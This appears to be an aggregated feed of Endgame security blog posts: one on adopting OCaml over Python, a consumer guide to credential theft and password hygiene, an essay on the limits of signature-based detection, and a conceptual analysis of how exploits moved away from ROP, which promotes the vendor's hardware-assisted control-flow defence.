For many of our previous services, we utilized Python for its quick development turnaround and rich library ecosystem. However, we often encounter issues that arise from the aforementioned “quick” development, such as occasional bugs arising from type errors, or poor error handling causing service downtime. Hastily written services can also be difficult to refactor as their structure may become convoluted over time.

While many in our DevOps and R&D teams have Python backgrounds and continue to use it for many tasks, we have recently begun to use functional programming in OCaml to solve some of the issues that arise with rapid Python development. OCaml is a compiled, strongly typed programming language that emphasizes safety and expressiveness. It boasts a mature ecosystem of tools and libraries, and has been most used in industries which require a high degree of confidence in bug-free, performant code.  While it is considered a multi-paradigm language, OCaml strongly emphasizes a functional programming style, which provides many of the benefits covered in this post. With OCaml, we have improved our ability to adapt to changing requirements, and trust that the software we write is more stable and correct.

 

Distrought Man Juggling Five Hatchets

The freedom of programming in a dynamically typed language (Image source)

 

Python, we still want you around...

Many teams at Endgame still use Python for the majority of their development, and it has continued to provide great value for quickly getting services up-and-running. For many tasks in R&D, however, we needed a language that would allow us to refactor more easily, provide greater runtime safety, and catch more errors at compile time. Python did not quite meet our development, safety, and refactoring needs. We found that:

  • Python is fast to prototype/script in, but handling large amounts of data can sometimes expose issues that crop up due to dynamic typing.
  • Handling JSON in particular can allow for runtime errors as free-form input/mangled data cause type unsafe functions to fail unexpectedly.
  • Python is relatively slow in runtime performance due to its interpreted nature.
  • Packaging and deploying Python programs requires also deploying a Python interpreter, which itself requires many additional dependencies.
  • Codebases written hastily in imperative languages can often devolve into ball-of-mud refactoring nightmares, especially with reliance on deeply nested polymorphic inheritance or proliferation of global state. Python often does little to encourage separation of external IO concerns from internal program logic. Without regular attention given to design and style, shared mutable variables can cause baffling behavior in large programs.

 

....But OCaml has what we need!

When an Endgamer with extensive previous functional programming experience suggested that our workflow could benefit from the balance of speed and safety that OCaml provides, we found that many of its features addressed our issues with Python.  We had several requirements for a new language if we were going to augment Python for DevOps and R&D:

 

Requirement: A language in which we could write a service quickly (Terseness/Expressiveness).

  • OCaml's syntax is extremely concise, while allowing for high-level programming features. This includes:
    • A type system including algebraic types and variants.
    • Higher-order functions, partial function application, and currying
    • Option types, which allow functions to require the caller to handle potential errors/lack of response.
    • A powerful pattern-matching system.

 

Requirement: A language with fast performance.

 

Requirement: A language that is easy to refactor. Due to the agile requirements process of R&D, we needed to be able to redesign service components easily.

 

Requirement: A language with more runtime safety guarantees.

  • This allows developers to write safer code, and safer libraries for reuse.
  • OCaml's type system allows for complex and expressive hierarchies of types checked by Hindley-Milner type inference.

 

Requirement: A mature language with library support for common use cases, as well as C Foreign Function Interface (FFI) bindings to extend external code as needed.

  • Much of OCaml’s library base is mature and has been stable and heavily tested for years.
  • OCaml’s Ctypes library allows for extremely simple binding to external C/C++ libraries.

 

Recently, many other people have had similar conclusions about OCaml’s benefits for systems’ programming, and have written posts about their experiences with the language:

https://tech.esper.com/2014/07/15/why-we-use-ocaml/

http://roscidus.com/blog/blog/2014/02/13/ocaml-what-you-gain/

http://www2.lib.uchicago.edu/keith/ocaml-class/why.html

So far, OCaml has made it much easier to write fast, stable, and safe services that are easy to return to and refactor later.  In the coming months, we will be publishing a series of technical blog posts describing our usage of OCaml at Endgame, as well as a handful of libraries and frameworks we have developed to support internal development.

 

Stay tuned!

Hacker's Guide to (Not) Having Your Passwords Stolen

$
0
0

Online credential theft has exploded in the past several years.  This month alone, numerous breaches have affected millions of users of high profile websites such as LinkedIn, MySpace, vk.com, and Tumblr. In these cases, criminals are not seeking corporate secrets or nuclear launch codes, but rather usernames and passwords for online accounts of everyday computer users.

Credential theft can come in many different flavors with varying levels of impact, from attacks targeting a single or small set of users, to attacks compromising credentials from within an enterprise, to attacks compromising the credentials of millions of users of an online service. While criminals certainly steal usernames and passwords for corporate accounts for extortion and corporate espionage, this article focuses on the compromise of personal  accounts in both targeted mass data breaches. This includes why criminals steal usernames and passwords, and the most common tactics criminals use to steal usernames and passwords. It concludes with some basic steps you can take to reduce your risk of being targeted, as well as how to respond once you’ve been notified of a password breach.

 

Why do criminals steal usernames and passwords?

The short answer is: for profit, eventually.

The long answer is: it depends.

Hackers steal usernames and passwords from websites for a handful of reasons, but most of them lead to cash eventually. Sometimes criminals steal a database of hundreds of thousands of users from a website and sell it wholesale directly on black market web forums. The larger the database, the more money they can charge for it. Sometimes criminals will use the usernames and passwords to log in to people’s email accounts and send spam email for dubious scam products, making money from referrals and product link-clicks. In each of the cases, the methods of monetization are “quantifiably linear”. The amount of money the criminal makes is strictly tied to the amount of usernames and passwords they steal. The value of the individual accounts is not a consideration.

The next reason criminals steal credentials is as a means to gain access to another, more valuable asset. Usernames and passwords by themselves provide very little value, but the assets that those credentials protect is oftentimes far more valuable. For example, ten thousand valid Gmail usernames and passwords may be worth several hundred or even thousands of dollars on underground criminal forums, but the ability to reset social media and banking passwords, access cell phone provider accounts, read confidential employer information, and even reset other email accounts provides far more value to an attacker.

Criminals steal credentials ultimately to make money or gain access to a more valuable piece of information. It is this monetization of credentials, and the subsequent growth of underground markets, that drives criminals to steal usernames and passwords.

 

How do hackers steal usernames and passwords?

There are two major categories of how attackers steal usernames and passwords: attacking the users directly and attacking the websites people use.

 

Attacking Users Directly

These techniques are effective in stealing usernames and passwords from relatively small numbers of people. If an attacker values the account information of a particular targeted person, these techniques also apply.  Some of these methods are obvious to a knowledgeable user and thus easier to protect against. However, as determination and intrusiveness escalates, these methods can be more difficult to stop.  While credentials for many victims of this type of attack can be packaged into large numbers for sale or use, this type of activity does not usually make the headlines.

Some criminals use a technique called  “phishing.” This process usually looks something like this:

  1. Hacker finds a large amount of Bank of Somewhere customers
  2. Hacker sends a fake login page to legitimate Bank of Somewhere customers hosted on a domain that looks simiar to "bankofsomewhere.com"
  3. Some small percentage of the victims unwittingly enter their usernames and passwords into the website that the hacker controls
  4. Hacker logs in to stolen accounts, transfer funds to an account they control

 

Some criminals use even broader phishing attacks to steal social media accounts: 

  1. Hacker sends fake Facebook login pages to as many email accounts as possible stating that there is a problem with their account that needs to be fixed
  2. Some victims enter their Facebook usernames and passwords
  3. Hacker uses access to their Facebook accounts to promote spam and adware-laden websites
  4. Hacker generates ad revenue from fake clicks and page visits

 

Sometimes criminals will want the credentials of a known high-value individual.  More care goes into customization and believability for these cases.  The attacker may go as far as attempting to impersonate the individual in tech support calls, hack the actual computer used by the high-value target to collect credentials, or other invasive techniques.  It can become difficult to defend against a determined attack, but fortunately, most of us aren’t of this level of interest to attackers and basic online hygiene principles listed below will provide some protection.  

 

Attacking a Website Directly

If a criminal wants to steal millions of usernames and passwords and doesn’t care who gets scooped up, he targets a website directly. The more credentials they steal, the more money they can get selling them or monetizing them in some other way. This almost always comes in the form of a criminal exploiting a vulnerability in the website itself. The criminal uses one of any number of tactics to gain access to the server supporting the website and steals the credentials directly from the database.  The credentials are usually stored as a large set of username and “hashed” password pairs.  A password “hash” simply refers to a more secure method of storing a password where a mathematical representation of your password is stored in lieu of the plaintext password.

Once the criminal steals the database, they often have to recover the passwords from the “hashed” form back to the actual plaintext password, allowing them to check it for likely reuse on other websites. This is accomplished by “brute forcing” the password hashes to recover anything that is computationally guessable (meaning, a password simple enough to be guessed by a wordlist or sequence of iterating characters, like AAAAA, AAAAB, AAAAC, and so on). This last factor is what highlights the importance of strong, complex passwords versus simple, easily-guessable passwords. If your password is a simple dictionary word, for example “baseball”, then your password will almost certainly be very simple to recover from it’s hashed form. Conversely, if your password is long and complex then you are better protected from a large website breach, as it would be computationally infeasible for an attacker to brute force a sufficiently strong password.

An example of this is as follows:

  1. Hacker targets a popular social media website called MyBook
  2. Hacker finds a vulnerability or misconfiguration in the server hosting the website and uses it to gain access to the website.
  3. Hacker locates the database of all registered users and creates a backup
  4. Hacker downloads the database backup he created of users and hashed passwords
  5. Hacker runs the hashed passwords though a password cracker for a week and recovers 50% of the total passwords
  6. Hacker sells the usernames and recovered passwords to someone on an underground hacking forum
  7. The person that purchased the database uses an automated program that checks all of the usernames and passwords against other websites for password reuse and gains access to thousands of email, social media, and online banking accounts

 

How do people protect themselves?

There are a several easy steps you can take to minimize the damage personally inflicted upon you by a password breach.

 

Use unique passwords on different websites

Imagine having the same key for your house, car, office, and gym locker. While it would be very convenient, it would be a nightmare if you lost it (or worse, if somebody stole it). Criminals gain access to multiple accounts on the Internet because they know that remembering passwords is hard and nobody likes to do it. By having unique passwords on different websites you are reducing the risk of a criminal gaining access to additional accounts as a result of stealing your password.

 

Use complex passwords

Complex passwords are essential to make them difficult to guess and difficult to recover from a compromised password hash.   I recommend using passwords that are at least 12 characters long that include a mix of letters, numbers, and symbols.  You should avoid using words that would be present in a dictionary to make password guessing and brute-forcing more difficult.  

 

Use a password manager

Password managers are programs that run on your computer, in your web browser, or directly on your smartphone. Instead of thinking of a password every time you register on a website, the password manager generates a long, complex, random password that you don’t have to remember. Then, whenever you want to log back into that website, you visit your password manager and copy and paste the saved password directly into the website.  LastPass and 1Password are two examples of popular password managers.  It is also important to note that a password manager inherently accomplishes the previous two recommendations.

 

Use multi-factor authentication on all high value accounts

Multi-factor authentication is a security control that adds an additional layer of security beyond username and password. Multi-factor authentication can come in many different forms, but the most common are a smart phone app, hardware token, or text message codes. Once you’ve enabled multi-factor authentication, you’ll enter your username and password on a website and it will ask you for a third item (a number from an app or a text message).

This ensures that the person attempting to log into the account with your username and password also has your smart phone, and thus, is more likely actually you. Even if a criminal successfully steals your online banking username and password through a targeted email attack or from a third-party website breach, they will not be able to log into your account because they do not have access to your smart phone. The best part is that most major banking, social media, and email providers offer and encourage multi-factor authentication free of charge.

 

Conclusion

Unfortunately, password breaches and credential theft aren’t going anywhere soon. They are an unwelcome and inconvenient fact of life in the modern Internet era. As long as credential theft remains relatively easy, and the market continues to offer large financial rewards, your usernames and passwords will continue to be highly sought.   The good news is that it’s pretty straightforward to protect yourself from a large majority of the real threats to average computer users. All of the recommended protections are low cost and take no more than an hour to set up. By following these basic steps you can significantly reduce your risk exposure to any credential breach. Now go forth, secure yourself, and use the Internet with confidence.

Detecting Modern Adversaries: Why Signatures Are Not Enough

$
0
0

Cyber intrusions are continuing unabated with no end in sight. Ransomware is on the rise, massive data breaches are announced with such regularity that the public is becoming numb to their significance, and APTs continue to burrow deep into networks going undetected for months or even years.  At the same time, most organizations across all industries are increasing their cyber security budgets but usually fail to produce a meaningful increase in defensive effectiveness.

In short, the adversary continues to win.  Fortunately, most security professionals and vendors are asking what must be done differently to increase defensive effectiveness.   We often hear that enhanced signature sharing is the primary solution.   From the other end, we hear that signatures are dead.  The truth lies in between.  

Signatures are effective in detecting a portion of what is already known and for hunting within your enterprise to understand the extent of a known intrusion.  However, due to their brittleness and increasing specificity to only the targeted victim, signatures are an utterly insufficient foundation for the caliber of detection and prevention capability needed today to prevent compromise or detect and remediate compromise as rapidly as possible.  

We need to do more.  We need to add additional layers of detection around signature and IOC search, looking for indications of attacker techniques at low levels in the system while simultaneously hunting for higher-order patterns which could indicate maliciousness across large sets of monitored hosts.  Moving from solely signature-based defenses to also including attacker techniques and patterns is the best way to maximize the defender’s chance of success in minimizing damage and loss.

 

Why aren’t signatures enough?

For the purpose of this post, we use the terms signature and Indicator of Compromise (IOC) interchangeably.  A good signature is a feature that, with a low false positive rate, uniquely corresponds to a known attack campaign or piece of malware.  We can group these in two buckets: network signatures and endpoint signatures.

 

On the network

Network signatures usually come in the form of blacklisted domains, IP addresses, URI structure, or patterns in command and control or other communications.  Two primary factors have massively reduced the effectiveness of network IOCs in recent years: attack infrastructure diversity and encryption.

First, adversaries know their infrastructure is a point of vulnerability in their campaigns and actively seek to diversify and blend in as much as possible.  The ubiquity of cloud services has been a major enabler for adversaries, allowing them to rapidly stand up and tear down infrastructure for low cost.  Others use legitimate cloud services for data exfiltration or command and control, bypassing a need for a dedicated C2 infrastructure.  Adversaries also engage compromised, unwitting nodes as disposable hop points.  Trying to keep up with every hop point to defend your network is not a winning strategy.

Adversaries would in the past often use the same infrastructure across many victims for long periods of time.  This is much less common today.  High caliber adversaries will usually use infrastructure across many victims for only very short-lived campaigns, sometimes going so far as to use entirely unique infrastructure for all phases of an operation targeting a specific victim.  Today, signatures may only be useful retrospectively to identify whether a newly discovered campaign (which may have taken place weeks or months ago) targeted you.  Signatures may actually prompt you to waste resources searching for something an adversary never would have used to target you in the first place.

Next, encryption has made it far more difficult to track patterns on the wire.  Network-level pattern matching capabilities such as Snort or Bro signatures used to be relatively effective in detecting intrusions in your network.  Malware authors need to design structured command and control communications to organize victim machines and direct victims to take certain actions.  Analysts can often fingerprint these communications structures and detect them on the wire, even if unique or unknown infrastructure is in use.  However, we are increasingly seeing malware communicate within end-to-end encrypted tunnels, usually using universal protocols such as SSL or TLS.  When communications are encrypted, unless SSL proxying or other intrusive traffic inspection technology is put into place these patterns are not visible to network security appliances applying these signatures.  Thus, the signatures for the malicious malware communication patterns will not fire and the intrusion will go unnoticed.

 

On the Endpoint

Evidence of an intrusion on workstations and servers can be found in numerous locations, including malware hashes, filenames, registry entries, and much more.  As with network infrastructure, in the past, malware was regularly reused across many victims for long periods of times without diversifying these artifacts.  Adversaries with any level of sophistication no longer make these mistakes.  They have learned that it is important to avoid a detrimental (from their point of view) global impact from a single detection.  Defenders need to understand this and pursue intrusions accordingly.  

Malware is often polymorphic, changing itself to have a unique hash every time and automatically diversifying filenames, persistence mechanisms, and other features which can be signatured.  In these cases, which are increasingly common, an artifact found in a single victim will not be effective as a global IOC.  Strategies that focus on patterns within malicious binaries themselves (Yara signatures, for example) can at times be relatively effective in detecting new tools from a given known malware family, but these can be difficult to use across an enterprise and are very prone to false positives.

In addition, some adversaries are moving entirely away from malware as their default way of accessing and interacting a victim.  Legitimate credentials and administrative tools like Powershell are often all that is needed to take desired actions on a network.  Malware is often only used for persistence and sometimes not used at all.  In these cases, the adversary does not leave behind a significant footprint to be used as the basis of IOCs.  IOCs will be entirely ineffective and the problem turns into distinguishing malicious usage of tools and credentials from normal operations.

 

Do we still need signatures?

For the reasons described above, signatures are not a sufficient foundation for detection and prevention in your network.  That said, they are still valuable.  They are useful and effective in catching unsophisticated tools and actors.  They can also help you determine if a given attack campaign has touched your systems.

Search functionality is very important to locate known IOCs on your systems and in your traffic.  Signature search is also necessary to determine the extent of a given compromise in your environment.  For example, if you find evidence that a certain registry key is being used for persistence on a compromised host, you need a way to look across your other systems to look for that same key.  IOCs of this sort are useful much more often inside your network than they are to other possible victims of the same adversary.  IOC searching is a part of threat hunting, but it’s not enough.

 

So we need more.  What should we do?

We need technologies to detect threats without relying on signatures.  This takes two main forms: looking deep in the operating system for indications of malicious activity and hunting for suspicious patterns across key data from many systems.  Basically, we must look a layer below and a layer above IOC search.

There are a few well established frameworks for understanding the sequencing and methodologies exhibited time and time again in cyber intrusions, such as Lockheed Martin’s Kill Chain and Mitre’s ATT&CK framework.  While adversaries constantly change and adapt malware, they actually use the same techniques over and over – process injection, credential dumping, token stealing, host enumeration, and lateral movement being a few examples of many.  An attacker can build a nearly infinite number of tools to do these things generating different IOCs, but they must go through the same choke points in the OS to execute these actions on the system.  We can identify these key chokepoints, develop ways to detect and optionally automatically block the adversary, and alert the cyber security operations team that a malicious event has taken place.  Effective tools can prevent malicious activity at the right chokepoints in real-time and alert the security team to a likely intrusion -  all without signatures.  

We also must look for suspicious activity and patterns across our endpoints.  This is the core of effective threat hunting, improving from simply finding what’s known to empowering security teams to find unknown and unique intrusions.  This is possible because adversaries leave a trail which can be followed.  Adversaries must operate on systems.  They must execute code. They usually communicate on the network. They often read, create, or modify files.  They do much more.  All of these breadcrumbs can be followed by an astute hunter.  The hunter can look at process activity information, network traffic, domain lookups, previously executed commands, persistence locations, and in other key areas.  Suspicious activity can be flagged, investigated, and detections can occur.  In this way, IOC search becomes a subset of hunting.

Hunting manually can be very difficult and will not scale.  However, by combining hunt methodologies with automation, analytics, and machine learning, hunt operations can be scaled and optimized.  Detections of unknown intrusions can be surfaced at speed and scale at this layer above traditional IOC search and then acted upon by the security team.    

 

Conclusion

We still need to use signatures.  It is important to have a capability to search for artifacts associated with known campaigns, to combat low caliber adversaries, and to pivot through your network once a unique adversary is discovered via other means.  

Signatures are not enough to form the detection and prevention solution needed to defend against modern threats.  They are neither effective on the host nor at the network level to detect advanced adversaries.  Additional detection capabilities which look at low level chokepoints in the operating system are necessary, as are simultaneously executed hunt operations across systems for indications of suspicious or malicious activity.  By combining hunting with automation, analytics, and machine learning, we can produce high quality detections which can be used by security operations teams in the same fashion as detections from chokepoint monitoring and signature monitoring.  

Combining these three layers - low-level attacker techniques detections, signature-based detections, and detections from automated hunts - maximizes the chances of stopping adversaries before they succeed.

ROP is Dying and Your Exploit Mitigations are on Life Support

$
0
0

Too often the defense community makes the mistake of focusing on the what, without truly understanding the why. This mindset often leads to the development of technologies that have limited effectiveness, and an even shorter shelf life. Time and again we’ve seen newly developed software protections bypassed shortly after their release.  This is especially true with exploit mitigations, and Return-Oriented Programming (ROP) in particular. In short, current defenses target obsolete offensive techniques.

The offensive community has known something for a long time that I would like to share with you. ROP is dying and ROP exploit mitigations aren’t as effective as you might think.

 

A Brief History of ROP

First, let us take a step back and look at what ROP is, and why many third party security products have ROP defenses. Over a decade ago, processor manufacturers began to add hardware enforcement of page level permissions. This support enabled operating systems to restrict code from executing anywhere in memory, a common exploit technique. Microsoft implemented this restriction in Windows XP Service Pack 2, and named it Data Execution Prevention, or DEP.

As Microsoft Windows and other operating systems introduced these countermeasures, researchers were quick to devise creative ways to bypass them. In his seminal paper, Sebastian Krahmer lays out what would eventually be named Return-Oriented Programming. Krahmer’s paper was published on September 28th 2005, shortly after DEP and similar mitigations went mainstream.

Since its publication, dozens of research papers, conference presentations, and exploits have used some form of Krahmer’s idea of reusing legitimate code to circumvent DEP, and ROP became enemy number one.

Techniques for building ROP “gadgets” have varied over the last ten years, but the core purpose remains. Build a stack of legitimate code locations ending in a return, that when executed gives the attacker the ability to execute their arbitrary payload.

After a decade of study, defenders have come to understand key artifacts to detect and prevent these gadgets from changing permissions or executing code. This has led to add-on security solutions like Microsoft’s own “Enhanced Mitigation Experience Toolkit”, or EMET. But while security vendors were working on the ROP problem, attackers were overcoming a bigger issue, ASLR.

Address Space Layout Randomization (ALSR) is a defensive method for randomly assigning virtual addresses to code and data in a running program. ASLR aims to prevent an attacker from using previous knowledge of the address space to gain an advantage and execute malicious code. This has proven extremely effective in “raising the bar” of exploitation and is one of the most significant research challenges when building weaponized exploits.

Microsoft introduced ASLR in Windows Vista, but did not comprehensively implement it until sometime in 2011, when they recompiled all libraries to take advantage of it. While ASLR has proven to be effective, it must be fully enforced on every piece of data in a program. Because of this, the system falls apart if one piece of data is unprotected. Until fairly recently exploit writers have been abusing this loophole to bypass the mitigation.

As ASLR has improved through “full” ASLR, attackers have needed to read memory in their exploit code to adequately determine what data to target for a successful exploit. This step in exploit development is one of the most time consuming, but also the most powerful, because in many cases not only can you craft an exploit to read the target address space and bypass ASLR, you can also write into the target address space.

In short, the ability to read and write memory makes ROP unnecessary and is the reason Return-Oriented Programming is dying.

 

ROP is Dying

In 2014 Yang Yu presented “Write Once, Pwn Anywhere” at Blackhat USA. This presentation is a great demonstration of using a read and write “primitive” to make a small change that has a significant impact. In his presentation and proof-of-concept, Yu corrupts the Jscript.dll “safemode” flag stored in memory to enable the use of the WScript.Shell COM method. This method can be used to execute shell commands and is normally protected in Internet Explorer for obvious reasons. However, by changing the “safemode” value in memory, an attacker can bypass this restriction and execute arbitrary commands, without needing Return-Oriented Programming techniques.

Shortly after the presentation, researchers used Yu’s idea to exploit a VBScript vulnerability (CVE-2014-6332). Again, the exploit writer overcame the difficult problem of getting arbitrary memory read and write access, then used that to gain full-system access without tripping any software mitigations such as EMET.

Earlier this year, a component of the Angler exploit kit targeted a vulnerability in Silverlight (CVE-2016-0034) using a similar approach. First, trigger a vulnerability that gives programmatic read and write of virtual memory, and then overwrite critical data to gain code execution. In this exploit the writers were very clever. Instead of flipping a bit, like the previous examples, they created legitimate code in executable memory using Silverlight’s JIT engine. To gain code execution without ROP they overwrote their legitimate code page with their payload, absolving themselves of DEP restrictions, and EMET was none the wiser.

Finally, let’s look at a trend in several popular exploit kits that demonstrate the increased usage of “ROP-less” techniques, like previous examples, to exploit software. My colleague Matt Spisak astutely linked the change after CVE-2015-5119 to a technique originally developed by researcher Vitaly Toropov. Toropov’s technique, like the Silverlight one before, uses a clever method to bypass DEP without needing ROP. As the technique became public through the HackingTeam leak, the exploit kit authors quickly updated their exploits, and have completely bypassed EMET ever since.

These examples demonstrate some of the ways new exploit techniques are less reliant on Return-Oriented Programming. Many more techniques exist publicly, and as the HackingTeam leak proved, private and therefore unknown techniques exist, too. If you enjoy the art of exploitation, I strongly recommend the previous articles that dive into each technique in great detail. 

Exploit Kit

The exploit kit graph above illustrates really well the declining utility of ROP. It also perfectly demonstrates the difficulty in ROP-based exploit mitigations. A single change in exploit technique trends can have a dramatic and long lasting effect.

 

Towards Earlier Detection

As attackers have moved away from ROP and towards a more advanced, and frankly harder to detect, technique for executing payloads, what can we do?

Recently, vendors such as Microsoft have recognized that ROP defenses are not enough. In Visual Studio 2015 Microsoft introduced Control Flow Guard (CFG). This new compiler based mitigation attempts to eliminate the ability to exploit certain classes of vulnerabilities. Unfortunately, to utilize CFG, code must be recompiled with the latest compiler and options. Alternatively, we have introduced a similar approach in the latest version of our product that works on any software without needing to be recompiled. So why have Microsoft and Endgame invested in locking down control-flow?

Over the years the industry has come to the conclusion that it is impossible to eliminate vulnerabilities. We also know that exploit authors are incredibly creative. The biggest impact we can have on the success of exploits is to limit the opportunity for creative bypasses. To oversimplify, exploits have to trigger a vulnerability, and then “do something”. Anti-exploit solutions need to disrupt this “something” early in the stages of exploitation to maintain an advantage.

To demonstrate, consider the following graphic that illustrates the high-level stages of an exploit.

Exploitation Process

This progression highlights that real defense must fight in the “Exploitation” stage of the attack. At this point, defenders still have the advantage of preventing successful exploitation. Unfortunately, most exploit prevention products continue to focus on the “Post-Exploitation” stage. By that time, the attacker will almost always win. In Post-Exploitation an attacker typically has the ability to execute some code on the target system, or gain adequate control over the program. This is the case with Return Oriented Programming techniques. By this stage defense has lost. Instead, real defense must focus on fighting in the “Exploitation” stage of the attack. At this point, defenders still have the advantage of preventing successful exploitation and can stop attackers from achieving their objectives.

Endgame’s solution to the problem takes a different approach than most vendors. Like Microsoft, we believe guarding control flow is the first step in building better prevention. However, we want customers to take advantage of the technology without having to recompile their code.

To achieve this we have developed a new concept we’re calling Hardware Assisted Control Flow Integrity, or HA-CFI. This technology utilizes hardware features available in Intel processors to monitor and prevent exploitation in real-time, with manageable overhead. By leveraging hardware features we can detect exploits before they reach the “Post-Exploitation” stage, and provide stronger protections, while defense still has the upper hand.

 

Conclusion

For the time being, ROP defenses are still providing some protection, especially in commodity and less advanced exploits, or when reading and writing memory may be impossible. However, its death is imminent and something the security community must acknowledge. The community must not be lured into a false sense of security while a large number of successful attacks go unnoticed.

Next generation exploit defense must move to detecting and preventing exploitation patterns in earlier stages of the process to maintain the defensive advantage needed to limit exploit authors’ creativity and effectively block them. At Endgame, we understand the fragility of “Post-Exploitation” preventions. Good exploit mitigations greatly reduce the attackers’ opportunity. If you’d like to hear more, come and see the latest research we are presenting this summer at Blackhat USA titled “Capturing 0day Exploits with PERFectly Placed Hardware Traps”. If you can’t make it to Vegas, I’ll also host a webinar covering this topic on August 17.

This is an exciting time for exploit mitigations as software vendors continue to make important changes that reduce the impact of vulnerabilities and security vendors such as Endgame push the state-of-the-art in third party detection and prevention. While ROP, and defenses against it, may be showing their age, there is still a lot of opportunity for new and effective solutions to the exploit problem.

Viewing all 698 articles
Browse latest View live